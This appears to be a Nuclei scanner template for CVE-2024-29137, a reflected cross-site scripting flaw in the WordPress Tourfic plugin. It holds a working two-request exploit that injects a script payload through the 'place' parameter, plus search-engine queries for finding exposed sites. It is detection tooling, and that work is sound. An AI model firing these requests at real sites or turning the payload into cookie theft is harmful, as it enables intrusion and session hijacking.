漏洞描述
The Tourfic plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to and including 2.11.7 due to insufficient input sanitization and output escaping in the 'place' parameter.
id: CVE-2024-29137
info:
name: WordPress Tourfic Plugin <= 2.11.7 - Cross-Site Scripting
author: Shivam Kamboj
severity: high
description: |
The Tourfic plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to and including 2.11.7 due to insufficient input sanitization and output escaping in the 'place' parameter.
impact: |
Attackers can execute malicious scripts in users' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of users.
remediation: |
Update to Tourfic version 2.11.8 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-29137
- https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tourfic/tourfic-2117-reflected-cross-site-scripting
- https://wpscan.com/vulnerability/f93321c7-d4e3-470c-9fd9-8e65c2284c5d/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score: 7.1
cve-id: CVE-2024-29137
epss-score: 0.00095
epss-percentile: 0.27102
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: themefic
product: tourfic
framework: wordpress
publicwww-query: "/wp-content/plugins/tourfic/"
fofa-query: body="/wp-content/plugins/tourfic/"
tags: cve,cve2024,wordpress,wp-plugin,xss,tourfic,unauth,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}/index.php?rest_route=/wp/v2/pages&per_page=100'
extractors:
- type: regex
name: search_page_id
group: 1
regex:
- '"slug":"tf-search"[^}]*"link":"[^"]*page_id=(\d+)"'
internal: true
- method: GET
path:
- '{{BaseURL}}/?page_id={{search_page_id}}&type=tf_hotel&place=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&adults=2&children=1&room=1'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "><script>alert(document.domain)</script>")'
condition: and
# digest: 4b0a004830460221009c52ad9ac41e27552d8f349b91410d217194cd035a5e856d3155e3b3b19c0679022100e63f48016688bb32127bc49ef4bd6ea0124928b373042e784f935392b25f0067:922c64590222798bb761d5b6d8e72950